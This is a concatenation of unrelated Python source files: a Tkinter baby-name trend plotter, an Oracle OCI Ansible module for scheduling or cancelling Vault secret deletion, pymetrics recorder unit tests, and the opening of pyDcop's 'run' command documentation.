dict of baby name data and a list of name, plots the historical trend of those names onto the canvas. Input: canvas (Tkinter Canvas): The canvas on which we are drawing. name_data (dict): Dictionary holding baby name data lookup_names (List[str]): A list of names whose data you want to plot Returns: This function does not return any value. """ draw_fixed_lines(canvas) # draw the fixed background grid # Write your code below this line rank_space = (CANVAS_HEIGHT-GRAPH_MARGIN_SIZE*2) / MAX_RANK color_ct = 0 for name in lookup_names: # First for loop is to read the value of key name in name_data name_dict = name_data[name] point_lst = [] # record the point to draw line """ Second for loop, read the constant YEARS and see if it's in the """ for i in range(len(YEARS)): x_point = get_x_coordinate(CANVAS_WIDTH, i) if str(YEARS[i]) in name_dict: y_point_in_rank = GRAPH_MARGIN_SIZE+name_dict[str(YEARS[i])]*rank_space canvas.create_text(x_point + TEXT_DX, y_point_in_rank, text=name + ' ' + str(name_dict[str(YEARS[i])]), font='roboto 12', anchor=tkinter.SW, fill=COLORS[color_ct]) canvas.create_text(x_point + TEXT_DX, y_point_in_rank, text='♥︎', fill=COLORS[color_ct]) point_lst.append([x_point, y_point_in_rank]) else: y_point_out_of_rank = CANVAS_HEIGHT-GRAPH_MARGIN_SIZE canvas.create_text(x_point + TEXT_DX, y_point_out_of_rank, text=name + ' * ', font='roboto 12', anchor=tkinter.SW, fill=COLORS[color_ct]) canvas.create_text(x_point + TEXT_DX, y_point_out_of_rank, text='♥︎', fill=COLORS[color_ct]) point_lst.append([x_point, y_point_out_of_rank]) for point in range(len(point_lst)): if point+1 in range(len(point_lst)): canvas.create_line(point_lst[point][0], point_lst[point][1], point_lst[point+1][0], point_lst[point+1][1], fill=COLORS[color_ct], width=LINE_WIDTH) pause(DELAY) else: break color_ct = (color_ct + 1) % len(COLORS) ################################# # main() code is provided, feel free to read through it but DO NOT MODIFY def main(): # Load data name_data = babynames.read_files(FILENAMES) # Create the window and the canvas top = tkinter.Tk() top.wm_title('Baby Names') canvas = gui.make_gui(top, CANVAS_WIDTH, CANVAS_HEIGHT, name_data, draw_names, babynames.search_names) # Call draw_fixed_lines() once at startup so we have the lines # even before the user types anything. draw_fixed_lines(canvas) # This line starts the graphical loop that is responsible for # processing user interactions and plotting data top.mainloop() if __name__ == '__main__': main() #!/usr/bin/python # Copyright (c) 2017, 2021 Oracle and/or its affiliates. # This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license. # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) # Apache License v2.0 # See LICENSE.TXT for details. # GENERATED FILE - DO NOT EDIT - MANUAL CHANGES WILL BE OVERWRITTEN from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = { "metadata_version": "1.1", "status": ["preview"], "supported_by": "community", } DOCUMENTATION = """ --- module: oci_vault_secret_actions short_description: Perform actions on a Secret resource in Oracle Cloud Infrastructure description: - Perform actions on a Secret resource in Oracle Cloud Infrastructure - For I(action=cancel_secret_deletion), cancels the pending deletion of the specified secret. Canceling a scheduled deletion restores the secret's lifecycle state to what it was before you scheduled the secret for deletion. - For I(action=schedule_secret_deletion), schedules the deletion of the specified secret. This sets the lifecycle state of the secret to `PENDING_DELETION` and then deletes it after the specified retention period ends. version_added: "2.9" author: Oracle (@oracle) options: secret_id: description: - The OCID of the secret. type: str aliases: ["id"] required: true time_of_deletion: description: - An optional property indicating when to delete the secret version, expressed in L(RFC 3339,https://tools.ietf.org/html/rfc3339) timestamp format. - Applicable only for I(action=schedule_secret_deletion). type: str action: description: - The action to perform on the Secret. type: str required: true choices: - "cancel_secret_deletion" - "schedule_secret_deletion" extends_documentation_fragment: [ oracle.oci.oracle ] """ EXAMPLES = """ - name: Perform action cancel_secret_deletion on secret oci_vault_secret_actions: secret_id: ocid1.secret.oc1..xxxxxxEXAMPLExxxxxx action: cancel_secret_deletion - name: Perform action schedule_secret_deletion on secret oci_vault_secret_actions: time_of_deletion: 2018-04-03T21:10:29.600Z secret_id: ocid1.secret.oc1..xxxxxxEXAMPLExxxxxx action: schedule_secret_deletion """ RETURN = """ secret: description: - Details of the Secret resource acted upon by the current operation returned: on success type: complex contains: compartment_id: description: - The OCID of the compartment where you want to create the secret. returned: on success type: string sample: ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx current_version_number: description: - The version number of the secret version that's currently in use. returned: on success type: int sample: 56 defined_tags: description: - "Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see L(Resource Tags,https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm). Example: `{\\"Operations\\": {\\"CostCenter\\": \\"42\\"}}`" returned: on success type: dict sample: {'Operations': {'CostCenter': 'US'}} description: description: - A brief description of the secret. Avoid entering confidential information. returned: on success type: string sample: description_example freeform_tags: description: - "Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see L(Resource Tags,https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm). Example: `{\\"Department\\": \\"Finance\\"}`" returned: on success type: dict sample: {'Department': 'Finance'} id: description: - The OCID of the secret. returned: on success type: string sample: ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx key_id: description: - The OCID of the master encryption key that is used to encrypt the secret. returned: on success type: string sample: ocid1.key.oc1..xxxxxxEXAMPLExxxxxx lifecycle_details: description: - Additional information about the current lifecycle state of the secret. returned: on success type: string sample: lifecycle_details_example lifecycle_state: description: - The current lifecycle state of the secret. returned: on success type: string sample: CREATING metadata: description: - Additional metadata that you can use to provide context about how to use the secret or during rotation or other administrative tasks. For example, for a secret that you use to connect to a database, the additional metadata might specify the connection endpoint and the connection string. Provide additional metadata as key-value pairs. returned: on success type: dict sample: {} secret_name: description: - The user-friendly name of the secret. Avoid entering confidential information. returned: on success type: string sample: secret_name_example secret_rules: description: - A list of rules that control how the secret is used and managed. returned: on success type: complex contains: rule_type: description: - The type of rule, which either controls when the secret contents expire or whether they can be reused. returned: on success type: string sample: SECRET_EXPIRY_RULE secret_version_expiry_interval: description: - A property indicating how long the secret contents will be considered valid, expressed in L(ISO 8601,https://en.wikipedia.org/wiki/ISO_8601#Time_intervals) format. The secret needs to be updated when the secret content expires. No enforcement mechanism exists at this time, but audit logs record the expiration on the appropriate date, according to the time interval specified in the rule. The timer resets after you update the secret contents. The minimum value is 1 day and the maximum value is 90 days for this property. Currently, only intervals expressed in days are supported. For example, pass `P3D` to have the secret version expire every 3 days. returned: on success type: string sample: secret_version_expiry_interval_example time_of_absolute_expiry: description: - "An optional property indicating the absolute time when this secret will expire, expressed in L(RFC 3339,https://tools.ietf.org/html/rfc3339) timestamp format. The minimum number of days from current time is 1 day and the maximum number of days from current time is 365 days. Example: `2019-04-03T21:10:29.600Z`" returned: on success type: string sample: 2019-04-03T21:10:29.600Z is_secret_content_retrieval_blocked_on_expiry: description: - A property indicating whether to block retrieval of the secret content, on expiry. The default is false. If the secret has already expired and you would like to retrieve the secret contents, you need to edit the secret rule to disable this property, to allow reading the secret content. returned: on success type: bool sample: true is_enforced_on_deleted_secret_versions: description: - A property indicating whether the rule is applied even if the secret version with the content you are trying to reuse was deleted. returned: on success type: bool sample: true time_created: description: - "A property indicating when the secret was created, expressed in L(RFC 3339,https://tools.ietf.org/html/rfc3339) timestamp format. Example: `2019-04-03T21:10:29.600Z`" returned: on success type: string sample: 2019-04-03T21:10:29.600Z time_of_current_version_expiry: description: - "An optional property indicating when the current secret version will expire, expressed in L(RFC 3339,https://tools.ietf.org/html/rfc3339) timestamp format. Example: `2019-04-03T21:10:29.600Z`" returned: on success type: string sample: 2019-04-03T21:10:29.600Z time_of_deletion: description: - "An optional property indicating when to delete the secret, expressed in L(RFC 3339,https://tools.ietf.org/html/rfc3339) timestamp format. Example: `2019-04-03T21:10:29.600Z`" returned: on success type: string sample: 2019-04-03T21:10:29.600Z vault_id: description: - The OCID of the vault where the secret exists. returned: on success type: string sample: ocid1.vault.oc1..xxxxxxEXAMPLExxxxxx sample: { "compartment_id": "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx", "current_version_number": 56, "defined_tags": {'Operations': {'CostCenter': 'US'}}, "description": "description_example", "freeform_tags": {'Department': 'Finance'}, "id": "ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx", "key_id": "ocid1.key.oc1..xxxxxxEXAMPLExxxxxx", "lifecycle_details": "lifecycle_details_example", "lifecycle_state": "CREATING", "metadata": {}, "secret_name": "secret_name_example", "secret_rules": [{ "rule_type": "SECRET_EXPIRY_RULE", "secret_version_expiry_interval": "secret_version_expiry_interval_example", "time_of_absolute_expiry": "2019-04-03T21:10:29.600Z", "is_secret_content_retrieval_blocked_on_expiry": true, "is_enforced_on_deleted_secret_versions": true }], "time_created": "2019-04-03T21:10:29.600Z", "time_of_current_version_expiry": "2019-04-03T21:10:29.600Z", "time_of_deletion": "2019-04-03T21:10:29.600Z", "vault_id": "ocid1.vault.oc1..xxxxxxEXAMPLExxxxxx" } """ from ansible.module_utils.basic import AnsibleModule from ansible_collections.oracle.oci.plugins.module_utils import ( oci_common_utils, oci_wait_utils, ) from ansible_collections.oracle.oci.plugins.module_utils.oci_resource_utils import ( OCIActionsHelperBase, get_custom_class, ) try: from oci.vault import VaultsClient from oci.vault.models import ScheduleSecretDeletionDetails HAS_OCI_PY_SDK = True except ImportError: HAS_OCI_PY_SDK = False class SecretActionsHelperGen(OCIActionsHelperBase): """ Supported actions: cancel_secret_deletion schedule_secret_deletion """ @staticmethod def get_module_resource_id_param(): return "secret_id" def get_module_resource_id(self): return self.module.params.get("secret_id") def get_get_fn(self): return self.client.get_secret def get_resource(self): return oci_common_utils.call_with_backoff( self.client.get_secret, secret_id=self.module.params.get("secret_id"), ) def cancel_secret_deletion(self): return oci_wait_utils.call_and_wait( call_fn=self.client.cancel_secret_deletion, call_fn_args=(), call_fn_kwargs=dict(secret_id=self.module.params.get("secret_id"),), waiter_type=oci_wait_utils.NONE_WAITER_KEY, operation="{0}_{1}".format( self.module.params.get("action").upper(), oci_common_utils.ACTION_OPERATION_KEY, ), waiter_client=self.get_waiter_client(), resource_helper=self, wait_for_states=self.get_action_desired_states( self.module.params.get("action") ), ) def schedule_secret_deletion(self): action_details = oci_common_utils.convert_input_data_to_model_class( self.module.params, ScheduleSecretDeletionDetails ) return oci_wait_utils.call_and_wait( call_fn=self.client.schedule_secret_deletion, call_fn_args=(), call_fn_kwargs=dict( secret_id=self.module.params.get("secret_id"), schedule_secret_deletion_details=action_details, ), waiter_type=oci_wait_utils.NONE_WAITER_KEY, operation="{0}_{1}".format( self.module.params.get("action").upper(), oci_common_utils.ACTION_OPERATION_KEY, ), waiter_client=self.get_waiter_client(), resource_helper=self, wait_for_states=self.get_action_desired_states( self.module.params.get("action") ), ) SecretActionsHelperCustom = get_custom_class("SecretActionsHelperCustom") class ResourceHelper(SecretActionsHelperCustom, SecretActionsHelperGen): pass def main(): module_args = oci_common_utils.get_common_arg_spec( supports_create=False, supports_wait=False ) module_args.update( dict( secret_id=dict(aliases=["id"], type="str", required=True), time_of_deletion=dict(type="str"), action=dict( type="str", required=True, choices=["cancel_secret_deletion", "schedule_secret_deletion"], ), ) ) module = AnsibleModule(argument_spec=module_args, supports_check_mode=True) if not HAS_OCI_PY_SDK: module.fail_json(msg="oci python sdk required for this module.") resource_helper = ResourceHelper( module=module, resource_type="secret", service_client_class=VaultsClient, namespace="vault", ) result = resource_helper.perform_action(module.params.get("action")) module.exit_json(**result) if __name__ == "__main__": main() tests/unit/recorders/test_default.py from __future__ import ( absolute_import, unicode_literals, ) import time from typing import ( Any, Dict, Optional, cast, ) from conformity import fields from conformity.error import ValidationError import freezegun import mock import pytest import six from pymetrics.instruments import ( Timer, TimerResolution, ) from pymetrics.publishers.base import MetricsPublisher from pymetrics.publishers.null import NullPublisher from pymetrics.recorders.base import MetricsRecorder from pymetrics.recorders.default import DefaultMetricsRecorder mock_publisher = mock.MagicMock(spec=MetricsPublisher) mock_publisher_extra = mock.MagicMock(spec=MetricsPublisher) # noinspection PyAbstractClass @fields.ClassConfigurationSchema.provider( fields.Dictionary({}), ) class MockPublisher(MetricsPublisher): def __new__(cls, *args, **kwargs): return mock_publisher # noinspection PyAbstractClass @fields.ClassConfigurationSchema.provider( fields.Dictionary({}), ) class MockPublisherExtra(MetricsPublisher): def __new__(cls, *args, **kwargs): return mock_publisher_extra class FakeImproperlyConfigured(Exception): pass # noinspection PyProtectedMember class TestDefaultMetricsRecorderConfiguration(object): # noinspection PyMethodMayBeStatic def teardown_method(self, _method): DefaultMetricsRecorder.attempted_django_exception_import = False DefaultMetricsRecorder.django_settings = None DefaultMetricsRecorder.DjangoImproperlyConfigured = DefaultMetricsRecorder.StubImproperlyConfigured def test_config_no_config(self): recorder = DefaultMetricsRecorder('me') assert recorder.is_configured is False def test_config_explicit(self): recorder = DefaultMetricsRecorder('me', config={ 'version': 2, 'publishers': [ {'path': 'tests.unit.recorders.test_default:MockPublisher'}, ], }) assert recorder.is_configured is True assert recorder._configuration is not None assert len(recorder._configuration.publishers) == 1 assert recorder._configuration.publishers[0] is mock_publisher # re-config should do nothing recorder.configure({'bad_config': 'bad_value'}) def test_config_django_causes_conformity_import_error(self): django_exceptions = mock.MagicMock() django_exceptions.ImproperlyConfigured = FakeImproperlyConfigured django_conf = mock.MagicMock() e = ValidationError( "Invalid keyword arguments:\n - middleware.0.path: ImportError: cannot import name 'baz' from 'foo.bar' " ) if six.PY2: django_conf.settings.__nonzero__.side_effect = e else: django_conf.settings.__bool__.side_effect = e with mock.patch.dict('sys.modules', { 'django': mock.MagicMock(), 'django.conf': django_conf, 'django.core': mock.MagicMock(), 'django.core.exceptions': django_exceptions, }): recorder = DefaultMetricsRecorder('me') assert recorder.is_configured is False def test_config_django_causes_conformity_other_error(self): django_exceptions = mock.MagicMock() django_exceptions.ImproperlyConfigured = FakeImproperlyConfigured django_conf = mock.MagicMock() e = ValidationError( "Invalid keyword arguments:\n - middleware.0.path: Some other error that isn't an import error " ) if six.PY2: django_conf.settings.__nonzero__.side_effect = e else: django_conf.settings.__bool__.side_effect = e with mock.patch.dict('sys.modules', { 'django': mock.MagicMock(), 'django.conf': django_conf, 'django.core': mock.MagicMock(), 'django.core.exceptions': django_exceptions, }), pytest.raises(ValidationError) as error_context: DefaultMetricsRecorder('me') assert error_context.value is e def test_config_django_available_but_settings_broken1(self): django_exceptions = mock.MagicMock() django_exceptions.ImproperlyConfigured = FakeImproperlyConfigured django_conf = mock.MagicMock() if six.PY2: django_conf.settings.__nonzero__.side_effect = FakeImproperlyConfigured else: django_conf.settings.__bool__.side_effect = FakeImproperlyConfigured with mock.patch.dict('sys.modules', { 'django': mock.MagicMock(), 'django.conf': django_conf, 'django.core': mock.MagicMock(), 'django.core.exceptions': django_exceptions, }): recorder = DefaultMetricsRecorder('me') assert recorder.is_configured is False def test_config_django_available_but_settings_false(self): django_exceptions = mock.MagicMock() django_exceptions.ImproperlyConfigured = FakeImproperlyConfigured django_conf = mock.MagicMock() if six.PY2: django_conf.settings.__nonzero__.return_value = False else: django_conf.settings.__bool__.return_value = False with mock.patch.dict('sys.modules', { 'django': mock.MagicMock(), 'django.conf': django_conf, 'django.core': mock.MagicMock(), 'django.core.exceptions': django_exceptions, }): recorder = DefaultMetricsRecorder('me') assert recorder.is_configured is False def test_config_django_available_but_settings_broken2(self): django_exceptions = mock.MagicMock() django_exceptions.ImproperlyConfigured = FakeImproperlyConfigured class S(object): def __getattr__(self, item): raise FakeImproperlyConfigured() django_conf = mock.MagicMock() django_conf.settings = S() with mock.patch.dict('sys.modules', { 'django': mock.MagicMock(), 'django.conf': django_conf, 'django.core': mock.MagicMock(), 'django.core.exceptions': django_exceptions, }): recorder = DefaultMetricsRecorder('me') assert recorder.is_configured is False def test_config_django_available_but_settings_missing(self): django_exceptions = mock.MagicMock() django_exceptions.ImproperlyConfigured = FakeImproperlyConfigured django_conf = mock.MagicMock() django_conf.settings.DEBUG = True del django_conf.settings.METRICS del django_conf.settings.SOA_SERVER_SETTINGS with mock.patch.dict('sys.modules', { 'django': mock.MagicMock(), 'django.conf': django_conf, 'django.core': mock.MagicMock(), 'django.core.exceptions': django_exceptions, }): recorder = DefaultMetricsRecorder('me') assert recorder.is_configured is False def test_config_django_available_main_settings_preferred(self): django_exceptions = mock.MagicMock() django_exceptions.ImproperlyConfigured = FakeImproperlyConfigured django_conf = mock.MagicMock() django_conf.settings.DEBUG = True django_conf.settings.METRICS = { 'version': 2, 'publishers': [ {'path': 'tests.unit.recorders.test_default:MockPublisherExtra'}, ] } django_conf.settings.SOA_SERVER_SETTINGS = {'metrics': {'kwargs': {'config': { 'version': 2, 'publishers': [ {'path': 'tests.unit.recorders.test_default:MockPublisher'}, ] }}}} with mock.patch.dict('sys.modules', { 'django': mock.MagicMock(), 'django.conf': django_conf, 'django.core': mock.MagicMock(), 'django.core.exceptions': django_exceptions, }): recorder = DefaultMetricsRecorder('me') assert recorder.is_configured is True assert recorder._configuration is not None assert len(recorder._configuration.publishers) == 1 assert recorder._configuration.publishers[0] is mock_publisher_extra assert recorder._configuration.version == 2 recorder = DefaultMetricsRecorder('you') assert recorder.is_configured is True assert recorder._configuration is not None assert len(recorder._configuration.publishers) == 1 assert recorder._configuration.publishers[0] is mock_publisher_extra assert recorder._configuration.version == 2 def test_config_django_available_soa_settings_used(self): django_exceptions = mock.MagicMock() django_exceptions.ImproperlyConfigured = FakeImproperlyConfigured django_conf = mock.MagicMock() django_conf.settings.DEBUG = True del django_conf.settings.METRICS django_conf.settings.SOA_SERVER_SETTINGS = {'metrics': {'kwargs': {'config': { 'version': 2, 'publishers': [ {'path': 'tests.unit.recorders.test_default:MockPublisher'}, ] }}}} with mock.patch.dict('sys.modules', { 'django': mock.MagicMock(), 'django.conf': django_conf, 'django.core': mock.MagicMock(), 'django.core.exceptions': django_exceptions, }): recorder = DefaultMetricsRecorder('me') assert recorder.is_configured is True assert recorder._configuration is not None assert len(recorder._configuration.publishers) == 1 assert recorder._configuration.publishers[0] is mock_publisher assert recorder._configuration.version == 2 recorder = DefaultMetricsRecorder('you') assert recorder.is_configured is True assert recorder._configuration is not None assert len(recorder._configuration.publishers) == 1 assert recorder._configuration.publishers[0] is mock_publisher assert recorder._configuration.version == 2 # noinspection PyProtectedMember class TestConfigurationWithConformity(object): def test_no_prefix_no_config(self): field = fields.ClassConfigurationSchema(base_class=MetricsRecorder) config = { 'path': 'pymetrics.recorders.default.DefaultMetricsRecorder', 'kwargs': {}, } # type: Dict[six.text_type, Any] assert field.errors(config) config = { 'path': 'pymetrics.recorders.default.DefaultMetricsRecorder', 'kwargs': { 'prefix': None, }, } assert not field.errors(config) recorder = config['object'](**config['kwargs']) assert isinstance(recorder, DefaultMetricsRecorder) assert recorder.prefix is None assert recorder._configuration is None def test_prefix_no_config(self): field = fields.ClassConfigurationSchema(base_class=MetricsRecorder) config = { 'path': 'pymetrics.recorders.default.DefaultMetricsRecorder', 'kwargs': { 'prefix': 'hello.world', }, } # type: Dict[six.text_type, Any] assert not field.errors(config) recorder = config['object'](**config['kwargs']) assert isinstance(recorder, DefaultMetricsRecorder) assert recorder.prefix == 'hello.world' assert recorder._configuration is None def test_prefix_with_config(self): field = fields.ClassConfigurationSchema(base_class=MetricsRecorder) config = { 'path': 'pymetrics.recorders.default.DefaultMetricsRecorder', 'kwargs': { 'prefix': 'goodbye.mars', 'config': { 'version': 2, 'publishers': [ {'path': 'pymetrics.publishers.null.NullPublisher'} ], }, }, } # type: Dict[six.text_type, Any] assert not field.errors(config) recorder = config['object'](**config['kwargs']) assert isinstance(recorder, DefaultMetricsRecorder) assert recorder.prefix == 'goodbye.mars' assert recorder._configuration is not None assert len(recorder._configuration.publishers) == 1 assert isinstance(recorder._configuration.publishers[0], NullPublisher) # noinspection PyProtectedMember class TestDefaultMetricsRecorder(object): @staticmethod def _recorder(prefix, meta=False): # type: (Optional[six.text_type], bool) -> DefaultMetricsRecorder return DefaultMetricsRecorder(prefix, config={ 'version': 2, 'enable_meta_metrics': meta, 'publishers': [ {'path': 'tests.unit.recorders.test_default:MockPublisher'}, ], }) def test_counter(self): recorder = self._recorder('me') recorder.counter('foo.bar').increment() recorder.counter('foo.bar').increment() recorder.counter('foo.bar').increment() recorder.counter('foo.bar', tag_1='value_1').increment() recorder.counter('foo.bar', tag_1='value_1').increment() recorder.counter('baz.qux').increment() assert recorder.unpublished_metrics_count == 3 metrics = recorder.get_all_metrics() assert len(metrics) == 3 for metric in metrics: if metric.name == 'me.foo.bar': if metric.value == 3: assert not metric.tags else: assert metric.value == 2 assert metric.tags['tag_1'] == 'value_1' else: assert metric.name == 'me.baz.qux' assert not metric.tags assert metric.value == 1 def test_gauge(self): recorder = self._recorder('you') recorder.gauge('foo.bar') recorder.gauge('foo.bar').set(3) recorder.gauge('baz.qux').set(2) recorder.gauge('baz.qux', initial_value=1, tag_2='value_2') assert recorder.unpublished_metrics_count == 4 metrics = recorder.get_all_metrics() assert len(metrics) == 4 possible_foo = {0, 3} for metric in metrics: if metric.name == 'you.foo.bar': assert not metric.tags assert metric.value in possible_foo possible_foo -= {metric.value} elif metric.name == 'you.baz.qux' and not metric.tags: assert metric.value == 2 elif metric.name == 'you.baz.qux': assert metric.tags['tag_2'] == 'value_2' assert metric.value == 1 else: raise AssertionError(metric.name) def test_histogram(self): recorder = self._recorder(None, meta=True) recorder.histogram('foo.bar').set(4) recorder.histogram('foo.bar') recorder.histogram('baz.qux').set(17) recorder.histogram('baz.qux', initial_value=5, tag_3='value_3') assert recorder.unpublished_metrics_count == 4 metrics = recorder.get_all_metrics() assert len(metrics) == 5 possible_foo = {0, 4} for metric in metrics: if metric.name == 'foo.bar': assert not metric.tags assert metric.value in possible_foo possible_foo -= {metric.value} elif metric.name == 'baz.qux' and not metric.tags: assert metric.value == 17 elif metric.name == 'baz.qux': assert metric.tags['tag_3'] == 'value_3' assert metric.value == 5 elif metric.name == 'pymetrics.meta.recorder.get_all_metrics': assert metric.value is not None assert metric.value > 0 assert cast(Timer, metric).resolution == TimerResolution.MICROSECONDS else: raise AssertionError(metric.name) assert metrics[0].name == 'pymetrics.meta.recorder.get_all_metrics' def test_timer(self): recorder = self._recorder('us') recorder.timer('foo.bar') recorder.timer('foo.bar').set(1) recorder.timer('foo.bar', resolution=TimerResolution.MICROSECONDS).set(4) recorder.timer('baz.qux') recorder.timer('baz.qux', force_new=True).set(2) recorder.timer('lorem') recorder.timer('lorem', tag_4='value_4') recorder.timer('lorem', tag_4='value_4').set(3) assert recorder.unpublished_metrics_count == 6 metrics = recorder.get_all_metrics() assert len(metrics) == 4 possible_foo = {1, 4} for metric in metrics: if metric.name == 'us.foo.bar': assert not metric.tags assert metric.value in possible_foo possible_foo -= {metric.value} if metric.value == 4: assert cast(Timer, metric).resolution == TimerResolution.MICROSECONDS else: assert cast(Timer, metric).resolution == TimerResolution.MILLISECONDS elif metric.name == 'us.baz.qux': assert metric.value == 2 assert not metric.tags elif metric.name == 'us.lorem': assert metric.tags['tag_4'] == 'value_4' assert metric.value == 3 else: raise AssertionError(metric.name) assert len(recorder.timers) == 4 assert len(recorder.timers['us.foo.bar']) == 2 assert len(recorder.timers['us.baz.qux']) == 2 assert len(recorder.timers['us.lorem']) == 1 assert len(recorder.timers[next(k for k in recorder.timers.keys() if k.startswith('us.lorem#'))]) == 1 assert recorder.get_all_metrics() == recorder.get_all_metrics() recorder.clear(only_published=True) assert recorder.unpublished_metrics_count == 2 assert recorder.get_all_metrics() == [] assert len(recorder.timers) == 2 assert len(recorder.timers['us.baz.qux']) == 1 assert len(recorder.timers['us.lorem']) == 1 recorder.clear() assert recorder.unpublished_metrics_count == 0 assert recorder.get_all_metrics() == [] assert len(recorder.timers) == 0 @mock.patch('pymetrics.recorders.default.publish_metrics') def test_publish_no_config(self, mock_publish_metrics): recorder = DefaultMetricsRecorder('oops') recorder.counter('foo.bar').increment() recorder.timer('baz.qux').set(15) recorder.publish_all() assert recorder.get_all_metrics() == [] assert mock_publish_metrics.call_count == 0 @mock.patch('pymetrics.recorders.default.publish_metrics') def test_publish_with_config(self, mock_publish_metrics): recorder = self._recorder('oops') recorder.counter('foo.bar').increment() recorder.timer('baz.qux').set(15) recorder.publish_all() assert recorder.get_all_metrics() == [] assert mock_publish_metrics.call_count == 1 args, _ = mock_publish_metrics.call_args assert len(args[0]) == 2 assert args[0][0].name == 'oops.foo.bar' assert args[0][0].value == 1 assert args[0][1].name == 'oops.baz.qux' assert args[0][1].value == 15 assert recorder._configuration is not None assert args[1] == recorder._configuration def test_publish_if_full_or_old(self): recorder = self._recorder('no') with mock.patch.object(recorder, 'publish_all') as mock_publish, \ freezegun.freeze_time() as frozen_time: def se(): recorder._last_publish_timestamp = time.time() mock_publish.side_effect = se recorder.unpublished_metrics_count = 1 recorder.publish_if_full_or_old() mock_publish.assert_called_once_with() mock_publish.reset_mock() recorder.publish_if_full_or_old() recorder.publish_if_full_or_old() recorder.publish_if_full_or_old() recorder.publish_if_full_or_old() assert mock_publish.call_count == 0 recorder.unpublished_metrics_count = 18 recorder.publish_if_full_or_old() assert mock_publish.call_count == 0 recorder.unpublished_metrics_count = 19 recorder.publish_if_full_or_old() mock_publish.assert_called_once_with() mock_publish.reset_mock() recorder.unpublished_metrics_count = 1 frozen_time.tick(9) recorder.publish_if_full_or_old() assert mock_publish.call_count == 0 frozen_time.tick(1) recorder.publish_if_full_or_old() mock_publish.assert_called_once_with() mock_publish.reset_mock() recorder.publish_if_full_or_old() recorder.publish_if_full_or_old() assert mock_publish.call_count == 0 frozen_time.tick(13) recorder.publish_if_full_or_old(max_age=14) assert mock_publish.call_count == 0 frozen_time.tick(1) recorder.publish_if_full_or_old() mock_publish.assert_called_once_with() mock_publish.reset_mock() def test_throttled_publish_all(self): recorder = self._recorder('no') with mock.patch.object(recorder, 'publish_all') as mock_publish, \ freezegun.freeze_time() as frozen_time: def se(): recorder._last_publish_timestamp = time.time() mock_publish.side_effect = se recorder.throttled_publish_all() mock_publish.assert_called_once_with() mock_publish.reset_mock() recorder.throttled_publish_all() recorder.throttled_publish_all() recorder.throttled_publish_all() recorder.throttled_publish_all() assert mock_publish.call_count == 0 frozen_time.tick(9) recorder.throttled_publish_all() assert mock_publish.call_count == 0 frozen_time.tick(1) recorder.throttled_publish_all() mock_publish.assert_called_once_with() mock_publish.reset_mock() recorder.throttled_publish_all() recorder.throttled_publish_all() assert mock_publish.call_count == 0 frozen_time.tick(13) recorder.throttled_publish_all(14) assert mock_publish.call_count == 0 frozen_time.tick(1) recorder.throttled_publish_all() mock_publish.assert_called_once_with() mock_publish.reset_mock() rpgoldman/pyDcop # BSD-3-Clause License # # Copyright 2017 Orange # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # 1. Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # # 2. Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # 3. Neither the name of the copyright holder nor the names of its contributors # may be used to endorse or promote products derived from this software # without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. """ .. _pydcop_commands_run: pydcop run ========== Running a (dynamic) DCOP Synopsis -------- :: pydcop run --algo [--algo_params ] [--distribution ] [--replication_method ] [--ktarget ] [--mode ] [--collect_on ] [--period

] [--run_metrics ] [--end_metrics ] --scenario Description ----------- The ``run`` command run a dcop, it is generally used for dynamic dcop where various events can occur during the life of the system. Most options are basically the same than the options of the :ref:`pydcop_commands_solve` command. The main differences are the optional options for resilent DCOP : ``--ktarget`` and ``--replication method`` and the scenario that contains events. See :ref:`usage_file_formats_scenario` for information on the scenario file format. When using the ``run`` command, you should use the global ``--timeout`` option. Note that the ``--timeout`` is used as a timeout for the solve process only. Bootstrapping the system and gathering metrics take additional time, which is not accounted for in the timeout. This means that the run command may take more time to return than the time set with the global ``--timeout`` option. You can always stop the process manually with ``CTRL+C``. Here again, the system may take a few seconds to stop. See Also -------- **Commands:** :ref:`pydcop_commands_solve`, :ref:`pydcop_commands_distribute` **Tutorials:** :ref:`tutorials_analysing_results` and :ref:`tutorials_dynamic_dcops` Options ------- ``--algo `` / ``-a `` Name of the dcop algorithm, e.g. 'maxsum', 'dpop', 'dsa', etc. ``--algo_params `` / ``-p `` Optional parameter for the DCOP algorithm, given as string ``name:value``. This option may be used multiple times to set several parameters. Available parameters depend on the algorithm, check :ref:`algorithms documentation`. ``--distribution `` / ``-d `` Either a :ref:`distribution algorithm` (``oneagent``, ``adhoc``, ``ilp_fgdp``, etc.) or the path to a yaml file containing the distribution (see :ref:`yaml format`). If not given, ``oneagent`` is used. ``--mode `` / ``-m`` Indicated if agents must be run as threads (default) or processes. either ``thread`` or ``process`` ``--collect_on `` / ``-c`` Metric collection 